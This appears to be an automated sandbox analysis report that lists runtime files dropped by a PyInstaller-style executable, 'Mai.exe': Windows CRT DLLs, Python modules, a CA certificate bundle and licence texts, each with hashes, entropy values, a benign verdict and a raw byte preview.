                                                          SHA-512:BA96FDD840A56C39AAA448A2CFF5A2EE3955B5623F1B82362CB1D8D0EC5FBB51037BDC9F55FE7B6C9F57932267E151E167E7F8D0CB70E907D03A48E0C2617B5B
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......Z.........." .........................................................0.......I....`.........................................`...<............ ...................'..............T............................................................................rdata..8...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-conio-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14240
                                                          Entropy (8bit):6.852755058390383
                                                          Encrypted:false
                                                          SSDEEP:384:Woc5WfhWW7HRN7yI4hBnRmuTcR9z/BIWd:7hxyH7RmuU9zld
                                                          MD5:19876C0A273C626F0E7BD28988EA290E
                                                          SHA1:8E7DD4807FE30786DD38DBB0DACA63256178B77C
                                                          SHA-256:07FDA71F93C21A43D836D87FEE199AC2572801993F00D6628DBA9B52FCB25535
                                                          SHA-512:CDD405F40AC1C0C27E281C4932FBBD6CC84471029D7F179ECF2E797B32BF208B3CD0CA6F702BB26F070F8CDD06B773C7BEB84862E4C01794938932146E74F1CA
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...='..........." .........................................................0............`.......................................................... ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-convert-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17312
                                                          Entropy (8bit):6.653286066355999
                                                          Encrypted:false
                                                          SSDEEP:192:WjJpdkKBcyxWfhWueWvcuyjS7HnhWgN7aoWhl9MMBdRgjLX01k9z3Azsu70S3:WnuyxWfhWI7HRN7GleLR9zusu7H
                                                          MD5:D66741472C891692054E0BAC6DDE100B
                                                          SHA1:4D7927E5BEA5CAC77A26DC36B09D22711D532C61
                                                          SHA-256:252B14D09B0EA162166C50E41AEA9C6F6AD8038B36701981E48EDFF615D3ED4B
                                                          SHA-512:C5AF302F237C436AC8FE42E0E017D9ED039B4C6A25C3772059F0A6929CBA3633D690D1F84AB0460BEB24A0704E2E1FE022E0E113780C6F92E3D38D1AFA8CEE95
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......n.........." .........................................................@......U.....`..........................................................0...................'..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-environment-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.828467063666851
                                                          Encrypted:false
                                                          SSDEEP:192:W3WfhWTeWvcuyjS7HnhWgN7a8WhkJh+Il+jX01k9z3ARdXd3:W3WfhWr7HRN7PPEjR9zSdJ
                                                          MD5:0EEB09C06C6926279484C3F0FBEF85E7
                                                          SHA1:D074721738A1E9BB21B9A706A6097EC152E36A98
                                                          SHA-256:10EB78864EBFF85EFC91CC91804F03FCD1B44D3A149877A9FA66261286348882
                                                          SHA-512:3CEB44C0CA86928D2FDD75BF6442FEBAFACA4DE79108561E233030635F428539C44FAAE5BCF12FF6AA756C413AB7558CCC37EEF8008C8AA5B37062D91F9D3613
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...... .........." .........................................................0.......9....`............................................."............ ...................'..............T............................................................................rdata..2...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-filesystem-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15272
                                                          Entropy (8bit):6.852618546365563
                                                          Encrypted:false
                                                          SSDEEP:192:WB7q6nWlC0i5CpWfhW9eWvcuyjS7HnhWgN7aUWhyaWGaN4NhrJgX01k9z3An9U3g:W9q6nWm5CpWfhWt7HRN7jTN4tgR9zYkE
                                                          MD5:A5DCE38BC9A149ABE5D2F61DB8D6CEC0
                                                          SHA1:05B6620F7D59D727299DE77ABE517210ADEA7FE0
                                                          SHA-256:A5B66647EE6794B7EE79F7A2A4A69DEC304DAEA45A11F09100A1AB092495B14B
                                                          SHA-512:252F7F841907C30FF34AA63C6F996514EB962FC6E1908645DA8BBDE137699FE056740520FEE6AD9728D1310261E6E3A212E1B69A7334832CE95DA599D7742450
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....`W.........." .........................................................0.......0....`.......................................................... ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-heap-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.799945740819369
                                                          Encrypted:false
                                                          SSDEEP:192:WHY3vY17aFBR0WfhWmeWvcuyjS7HnhWgN7a8Wht+h+Il+jX01k9z3ARzXNZ8l:WHY3eRWfhWg7HRN75EjR9zSz9K
                                                          MD5:841CB7C4BA59F43B5B659DD3DFE02CD2
                                                          SHA1:5F81D14C98A7372191ECEB65427F0C6E9F4ED5FA
                                                          SHA-256:2EAFCE6FF69A237B17AE004F1C14241C3144BE9EAEB4302FDC10DD1CB07B7673
                                                          SHA-512:F446ACB304960BA0D262D8519E1DA6FE9263CC5A9DA9AC9B92B0AC2CE8B3B90A4FD9D1FDFE7918B6A97AFE62586A36ABD8E8E18076D3AD4AD77763E901065914
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....n.p.........." .........................................................0............`.......................................................... ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-locale-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.911130988876802
                                                          Encrypted:false
                                                          SSDEEP:192:W/WfhWVeWvcuyjS7HnhWgN7a8WhrWGaN4NhrJgX01k9z3An9T28++:W/WfhWl7HRN7HTN4tgR9zYI8++
                                                          MD5:A404E8ECEE800E8BEDA84E8733A40170
                                                          SHA1:97A583E8B4BBCDAA98BAE17DB43B96123C4F7A6A
                                                          SHA-256:80C291E9FCEE694F03D105BA903799C79A546F2B5389ECD6349539C323C883AA
                                                          SHA-512:66B99F5F2DCB698137ECBC5E76E5CF9FE39B786EA760926836598CABBFA6D7A27E2876EC3BF424A8CBB37E475834AF55EF83ABB2ED3C9D72C6A774C207CFF0E0
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0......6.....`.............................................e............ ...................'..............T............................................................................rdata..u...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-math-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22440
                                                          Entropy (8bit):6.399039136519993
                                                          Encrypted:false
                                                          SSDEEP:384:WjQUbM4Oe59Ckb1hgmLVWfhWg7HRN7lQiTN4tgR9zYk:mRMq59Bb1jyLlHTNx9zh
                                                          MD5:CCF0A6129A16068A7C9AA3B0B7EEB425
                                                          SHA1:EA2461AB0B86C81520002AB6C3B5BF44205E070C
                                                          SHA-256:80C09EB650CF3A913C093E46C7B382E2D7486FE43372C4BC00C991D2C8F07A05
                                                          SHA-512:D4F2285C248ACE34EA9192E23B3E82766346856501508A7A7FC3E6D07EE05B1E57AD033B060FE0CC24EE8DC61F97757B001F5261DA8E063AB21EE80E323A306E
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Q............." .........,...............................................P......<.....`..............................................%...........@...............0...'..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-process-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.818799641918408
                                                          Encrypted:false
                                                          SSDEEP:192:WYRQqjd7xWfhWvNeWvcuyjS7HnhWgN7a8Wh/XBq21eX01k9z3ABfNBoOdb5e:WYKAWfhWF7HRN74Bl8R9zmfNBNdbo
                                                          MD5:E62A28C67A222B5AF736B6C3D68B7C82
                                                          SHA1:2214B0229F5FFC17E65DB03B085B085F4AF9D830
                                                          SHA-256:BD475E0C63AE3F59EA747632AB3D3A17DD66F957379FA1D67FA279718E9CD0F4
                                                          SHA-512:2F3590D061492650EE55A7CE8E9F1D836B7BB6976AE31D674B5ACF66C30A86A5C92619D28165A4A6C9C3D158BB57D764EE292440A3643B4E23CFFCDB16DE5097
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....-.........." .........................................................0.......o....`.............................................x............ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-runtime-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17832
                                                          Entropy (8bit):6.6533593146787045
                                                          Encrypted:false
                                                          SSDEEP:192:WbPtIPrpJhhf4AN5/KilWfhWneWvcuyjS7HnhWgN7a8WhRh+Il+jX01k9z3ARRXu:WbPtYr7LWfhWP7HRN7WEjR9zSR7bO
                                                          MD5:83433288A21FF0417C5BA56C2B410CE8
                                                          SHA1:B94A4AB62449BCA8507D70D7FB5CBC5F5DFBF02C
                                                          SHA-256:301C5418D2AEE12B6B7C53DD9332926CE204A8351B69A84F8E7B8A1344FA7EA1
                                                          SHA-512:F20DE6248D391F537DCC06E80174734CDD1A47DC67E47F903284D48FB7D8082AF4EED06436365FCE3079AAC5B4E07BBD9C1A1A5EB635C8FE082A59F566980310
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...K............" .........................................................@............`.............................................4............0...................'..............T............................................................................rdata..D...........................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-stdio-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):19368
                                                          Entropy (8bit):6.59035476139595
                                                          Encrypted:false
                                                          SSDEEP:192:W5fgnLpHquWYFxEpahXWfhWlYeWvcuyjS7HnhWgN7a8WhZOh+Il+jX01k9z3ARXF:WEZpFVhXWfhWli7HRN7FEjR9zSXUg
                                                          MD5:844E18709C2DEDA41F2228068A8D2CED
                                                          SHA1:871BF94A33FA6BB36FA1332F8EC98D8D3E6FE3B6
                                                          SHA-256:799E9174163F5878BEA68CA9A6D05C0EDF375518E7CC6CC69300C2335F3B5EA2
                                                          SHA-512:3BBB82D79F54D85DCBE6EE85A9909C999B760A09E8925D704A13BA18C0A610A97054AC8BD4C66C1D52AB08A474EDA78542D5D79AE036F2C8E1F1E584F5122945
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...U.x..........." ......... ...............................................@.......]....`.............................................a............0...............$...'..............T............................................................................rdata..a...........................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-string-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):19368
                                                          Entropy (8bit):6.582111769188288
                                                          Encrypted:false
                                                          SSDEEP:384:W5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWfhWJ7HRN7yl8R9zmfNBqFn284:y6S5yguNvZ5VQgx3SbwA71IkFDSylQ9e
                                                          MD5:5A82C7858065335CAD14FB06F0465C7E
                                                          SHA1:C5804404D016F64F3F959973EAEFB7820EDC97AD
                                                          SHA-256:3BF407F8386989AA5F8C82525C400B249E6F8D946A32F28C469C996569D5B2E3
                                                          SHA-512:88A06E823F90EF32D62794DAFE6C3E92755F1F1275C8192A50E982013A56CF58A3BA39E2D80B0DD5B56986F2A7D4C5B047A75F8D8F4B5B241CDF2D00BEEBD0D5
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...<.L..........." ......... ...............................................@...........`..........................................................0...............$...'..............T............................................................................rdata..............................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-time-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15784
                                                          Entropy (8bit):6.75722036011819
                                                          Encrypted:false
                                                          SSDEEP:192:WAJD2WfhWfeWvcuyjS7HnhWgN7a8WhSfdh+Il+jX01k9z3ARaXMgecI:WAcWfhWn7HRN7XfTEjR9zSacgbI
                                                          MD5:B64B9E13C90F84D0B522CD0645C2100C
                                                          SHA1:39822CB8F0914A282773E4218877168909FDC18D
                                                          SHA-256:2F6B0F89F4D680A9A9994D08AA5CD514794BE584A379487906071756AC644BD6
                                                          SHA-512:9CB03D1120DE577BDB9ED720C4EC8A0B89DB85969B74FBD900DCDC00CF85A78D9469290A5A5D39BE3691CB99D49CF6B84569AC7669A798B1E9B6C71047B350DE
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....n..........." .........................................................0......2.....`.......................................................... ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-utility-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.900466904881445
                                                          Encrypted:false
                                                          SSDEEP:192:W1fHQdujWfhWmeWvcuyjS7HnhWgN7a8WhLq21eX01k9z3ABfNB13gE:W1f9WfhWg7HRN7Ql8R9zmfNB3
                                                          MD5:26F020C0E210BCE7C7428AC049A3C5DA
                                                          SHA1:7BF44874B3BA7B5BA4B20BB81D3908E4CDE2819C
                                                          SHA-256:DFAD88B5D54C597D81250B8569F6D381F7016F935742AC2138BA2A9AE514C601
                                                          SHA-512:7DA07143CAB0A26B974FA90E3692D073B2E46E39875B2DD360648382D0BFCA986338697600C4BC9FE54FC3826DAA8FC8F2FEC987DE75480354C83ABA612AFA5F
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0.......t....`.............................................^............ ...................'..............T............................................................................rdata..n...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\certifi\cacert.pem

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):281617
                                                          Entropy (8bit):6.048201407322743
                                                          Encrypted:false
                                                          SSDEEP:6144:QW1H/M8fRR1mNplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5f:QWN/TR8NLWURrI55MWavdF0f
                                                          MD5:78D9DD608305A97773574D1C0FB10B61
                                                          SHA1:9E177F31A3622AD71C3D403422C9A980E563FE32
                                                          SHA-256:794D039FFDF277C047E26F2C7D58F81A5865D8A0EB7024A0FAC1164FEA4D27CF
                                                          SHA-512:0C2D08747712ED227B4992F6F8F3CC21168627A79E81C6E860EE2B5F711AF7F4387D3B71B390AA70A13661FC82806CC77AF8AB1E8A8DF82AD15E29E05FA911BF
                                                          Malicious:false
                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md.cp311-win_amd64.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10752
                                                          Entropy (8bit):4.666005138902942
                                                          Encrypted:false
                                                          SSDEEP:96:KJdp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCF4ioUjQcX6g8cim1qeSju1:KJ72HzzjBbRYoe2oRcqgvimoe
                                                          MD5:28AF0FFB49CC20FE5AF9FE8EFA49D6F1
                                                          SHA1:2C17057C33382DDFFEA3CA589018CBA04C4E49D7
                                                          SHA-256:F1E26EF5D12C58D652B0B5437C355A14CD66606B2FBC00339497DD00243081E0
                                                          SHA-512:9AA99E17F20A5DD485AE43AC85842BD5270EBAB83A49E896975A8FA9F98FFC5F7585BEF84ED46BA55F40A25E224F2640E85CEBE5ACB9087CF46D178ECC8029F0
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2;.vZ..vZ..vZ..."..tZ...&..tZ..="..tZ...&..}Z...&..~Z...&..uZ..&..uZ..vZ..PZ..'..wZ..'..wZ..'v.wZ..'..wZ..RichvZ..................PE..d....Z.d.........." ...#.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):113152
                                                          Entropy (8bit):5.883508414366263
                                                          Encrypted:false
                                                          SSDEEP:1536:Oa+euGiytUbL3818SfqZpr0w2a5i5hBi0GmV4Ms7oTGKMl8g1d:OtezmbL38+SCZqw2aA8QV67oTGKw
                                                          MD5:6CDCA2FDE9DF198DA58955397033AF98
                                                          SHA1:E457C97721504D25F43B549D57E4538A62623168
                                                          SHA-256:A4A758EABD1B2B45F3C4699BDFEBC98F196DC691C0A3D5407E17FFFFFAFC5DF7
                                                          SHA-512:7B3C384BA9993D3192ED852191FF77BDCD3421CBC69FF636C6DEB8FE7248E066573B68D80A8F280AE0C1CB015F79967D46D910455D932EAEAC072C76D0757E92
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........KSjk%.jk%.jk%.c...bk%...$.hk%.!.$.hk%... .gk%...!.bk%...&.ik%...$.ik%.jk$..k%...-.kk%...%.kk%.....kk%...'.kk%.Richjk%.........PE..d....Z.d.........." ...#..................................................................`..........................................s..d....t..................................$....f...............................d..@............0...............................text............................... ..`.rdata..~U...0...V... ..............@..@.data...p8.......,...v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\INSTALLER

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Mn:M
                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                          Malicious:false
                                                          Preview:pip.

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\LICENSE

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):197
                                                          Entropy (8bit):4.61968998873571
                                                          Encrypted:false
                                                          SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                          MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                          SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                          SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                          SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                          Malicious:false
                                                          Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\LICENSE.APACHE

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):11360
                                                          Entropy (8bit):4.426756947907149
                                                          Encrypted:false
                                                          SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                          MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                          SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                          SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                          SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                          Malicious:false
                                                          Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\LICENSE.BSD

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1532
                                                          Entropy (8bit):5.058591167088024
                                                          Encrypted:false
                                                          SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                          MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                          SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                          SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                          SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                          Malicious:false
